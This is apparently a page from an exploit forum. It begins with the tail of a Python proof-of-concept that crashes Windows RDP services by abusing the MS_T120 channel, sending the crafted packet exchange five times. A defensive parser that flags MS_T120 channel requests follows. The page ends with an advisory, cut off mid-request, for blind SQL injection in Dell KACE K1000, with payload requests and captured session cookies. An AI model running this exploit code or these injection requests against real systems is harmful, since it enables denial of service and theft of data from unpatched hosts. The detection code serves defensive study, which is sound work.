    size3 = struct.pack(">h", len(p)-118)
    size4 = struct.pack(">h", len(p)-132)
    size5 = struct.pack(">h", len(p)-390)
    ba = bytearray()
    ba.extend(map(ord, p))
    ba[2] = size0[0]
    ba[3] = size0[1]
    ba[10] = size1[0]
    ba[11] = size1[1]
    ba[107] = size2[0]
    ba[108] = size2[1]
    ba[116] = 0x81
    ba[117] = size3[1]
    ba[130] = 0x81
    ba[131] = size4[1]
    ba[392] = size5[1]
    tls.sendall(bytes(ba))
    tls.recv(8192)

def send_client_info(tls):
    p = b"\x03\x00\x01\x61\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x81\x52\x40\x00\xa1\xa5\x09\x04\x09\x04\xbb\x47\x03\x00\x00\x00\x0e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x74\x00\x65\x00\x73\x00\x74\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x41\x41\x41\x00\x38\x00\x2e\x00\x32\x00\x33\x00\x32\x00\x2e\x00\x31\x00\x00\x00\x40\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x41\x41\x41\x00\x57\x00\x53\x00\x5c\x00\x73\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00\xa4\x01\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00"
    tls.sendall(p)

# MCS Erect Domain Request, Attach User Request, then one Channel Join Request per channel.
def send_channel_packets(tls):
    p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00"
    tls.sendall(p1)
    p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28"
    tls.sendall(p2)
    tls.recv(1024)
    p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb"
    tls.sendall(p4)
    tls.recv(1024)
    p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec"
    tls.sendall(p5)
    tls.recv(1024)
    p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed"
    tls.sendall(p6)
    tls.recv(1024)
    p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee"
    tls.sendall(p7)
    tls.recv(1024)
    p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef"
    tls.sendall(p8)
    tls.recv(1024)

def send_confirm_active(tls, shareid):
    p = "\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
    ba = bytearray()
    ba.extend(map(ord, p))
    tls.sendall(bytes(ba))

def send_establish_session(tls):
    p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03"
    tls.sendall(p)
    p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
    tls.sendall(p)
    p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    tls.sendall(p)
    p = b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb"
    tls.sendall(p)
    p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00"
    tls.sendall(p)

def send_kill_packet(tls, arch):
    if arch == "32":
        p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    elif arch == "64":
        p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    else:
        print("Make the second argument '32' or '64' without quotes")
        sys.exit()
    tls.sendall(p)

def terminate_connection(tls):
    p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80"
    tls.sendall(p)

def main(args):
    tls = send_init_packets(args[1])
    send_client_data(tls)
    print("[+] ClientData Packet Sent")
    send_channel_packets(tls)
    print("[+] ChannelJoin/ErectDomain/AttachUser Sent")
    send_client_info(tls)
    print("[+] ClientInfo Packet Sent")
    tls.recv(8192)
    tls.recv(8192)
    send_confirm_active(tls, None)
    print("[+] ConfirmActive Packet Sent")
    send_establish_session(tls)
    print("[+] Session Established")
    send_kill_packet(tls, args[2])
    terminate_connection(tls)
    print("[+] Vuln Should Trigger")

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print("Usage: python poc.py 127.0.0.1 64")
        sys.exit()
    # The original test `sys.argv[2] == '32' or '64'` was always true; check both values.
    elif sys.argv[2] in ('32', '64'):
        # I've had to send the packets 5 times for hosts that havent
        # had a terminal session since their last reboot. I think
        # I know why but atm its just easier to send the exchange
        # 5 times and it'll crash eventually. Most of the time its
        # the first time though.
        for _ in range(5):
            main(sys.argv)
    else:
        print("Usage: python poc.py 127.0.0.1 64")
        sys.exit()
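The client data sent by send_client_data above ends with a CS_NET block naming four static channels: rdpsnd, cliprdr, drdynvc and MS_T120. As an added example (not part of the post), here is a Python parser for that part of an MCS Connect Initial PDU written from the monitoring side: it walks the client user data blocks, returns the requested channel names, and flags MS_T120, which the server binds internally and a normal client never asks for. The sample PDUs are constructed, with a stub core block and placeholder bytes where the transport headers would be.

```python
import struct

# Client-side GCC user data block types (MS-RDPBCGR 2.2.1.3); only CS_NET is decoded here.
CS_CORE = 0xC001
CS_NET = 0xC003
# H.221 non-standard key that precedes the client user data in the Connect Initial PDU.
H221_CLIENT_KEY = b"Duca"
# MS_T120 is bound internally by the server; a normal client never asks for it.
SUSPICIOUS_CHANNELS = {"MS_T120"}


def _ber_length(buf, pos):
    """Decode a BER length at buf[pos]; returns (length, position after it)."""
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    n = first & 0x7F
    if n == 0 or n > 2 or pos + 1 + n > len(buf):
        raise ValueError("unsupported BER length encoding")
    return int.from_bytes(buf[pos + 1:pos + 1 + n], "big"), pos + 1 + n


def client_channel_names(pdu):
    """Return the static virtual channel names a client requests in its Connect Initial PDU.

    After the "Duca" key and a BER length come (type, length) blocks, both 16-bit
    little-endian, the length including the 4-byte header.  CS_NET holds a 32-bit
    channelCount followed by channelCount 12-byte entries: an 8-byte NUL-padded
    name and 4 bytes of options.  The declared BER length is not trusted; blocks
    are walked to the end of the buffer with bounds checks instead.
    """
    start = pdu.find(H221_CLIENT_KEY)
    if start < 0:
        raise ValueError("no client GCC user data (Duca key) in PDU")
    _, pos = _ber_length(pdu, start + len(H221_CLIENT_KEY))
    names = []
    while pos + 4 <= len(pdu):
        btype, blen = struct.unpack_from("<HH", pdu, pos)
        if blen < 4 or pos + blen > len(pdu):
            raise ValueError("malformed user data block at offset %d" % pos)
        if btype == CS_NET:
            count, = struct.unpack_from("<I", pdu, pos + 4)
            if 8 + 12 * count > blen:
                raise ValueError("channelCount exceeds CS_NET block")
            for i in range(count):
                off = pos + 8 + 12 * i
                raw = pdu[off:off + 8].split(b"\x00", 1)[0]
                names.append(raw.decode("ascii", "replace"))
        pos += blen
    return names


def suspicious_channels(pdu):
    """Channel names in the PDU that a legitimate client has no reason to request."""
    return [n for n in client_channel_names(pdu) if n in SUSPICIOUS_CHANNELS]


def build_sample_connect_initial(channels):
    """Constructed sample PDU: a stub CS_CORE block and a CS_NET block listing
    `channels` as (name, options) pairs.  Eight zero bytes stand in for the
    TPKT/X.224/MCS/GCC headers, which the parser skips by locating the Duca key;
    a real CS_CORE is 234 bytes, but the parser only relies on its length field.
    """
    core = struct.pack("<HH", CS_CORE, 4 + 8) + b"\x00" * 8
    defs = b"".join(name.encode("ascii").ljust(8, b"\x00") + struct.pack("<I", opts)
                    for name, opts in channels)
    net = struct.pack("<HH", CS_NET, 8 + len(defs)) + struct.pack("<I", len(channels)) + defs
    body = core + net
    return b"\x00" * 8 + H221_CLIENT_KEY + b"\x82" + struct.pack(">H", len(body)) + body


# The channel set an ordinary client sends: sound, clipboard and dynamic channels
# (option flags taken from the client data above, read little-endian).
SAMPLE_BENIGN = build_sample_connect_initial(
    [("rdpsnd", 0xC000000F), ("cliprdr", 0xC0A00000), ("drdynvc", 0xC0800000)])
# The same set plus MS_T120, as in the post's client data.
SAMPLE_MS_T120 = build_sample_connect_initial(
    [("rdpsnd", 0xC000000F), ("cliprdr", 0xC0A00000), ("drdynvc", 0xC0800000), ("MS_T120", 0)])

if __name__ == "__main__":
    for label, pdu in (("benign", SAMPLE_BENIGN), ("ms_t120", SAMPLE_MS_T120)):
        print(label, client_channel_names(pdu), "flagged:", suspicious_channels(pdu))
```

On a real connection the PDU is carried inside TLS, so this check belongs in the RDP server's own logging, in a TLS-terminating proxy, or on hosts where network-level protection (NLA) already rejects the client before the channel list is processed.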
  13. # Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
# Date: [12/04/2018]
# Exploit Author: [SlidingWindow], Twitter: @kapil_khot
# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update

==================
#Product:-
==================

Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products.

==================
#Vulnerability:-
==================

The Dell Kace K1000 Appliance (now Quest Kace K1000) suffers from several vulnerabilities such as multiple Blind SQL Injections, Stored Cross-Site Scripting, and misconfigured CORS.

========================
#Vulnerability Details:-
========================

=============================================================================
1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
=============================================================================

The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to the 'selvalue' parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.

#Proof-Of-Concept:
------------------

1. Send the following request to the target:

GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1
Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc
Connection: close

2. Make a note of Content-Length in the response body.

3. Send the following request:

http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13

4. The response to the above request shows that an error occurred and we are being redirected to /common/error.php

5. Final payload to check if we get the original response back:

http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13

6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.

=========================================================================
2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
=========================================================================

The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', which can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to the ID parameter is not sanitized, which leads to a Blind SQL Injection vulnerability. An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database.

#Proof-Of-Concept:
------------------

1. Send the following request to the target:

GET /adminui/oval_detail.php?ID=6200 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
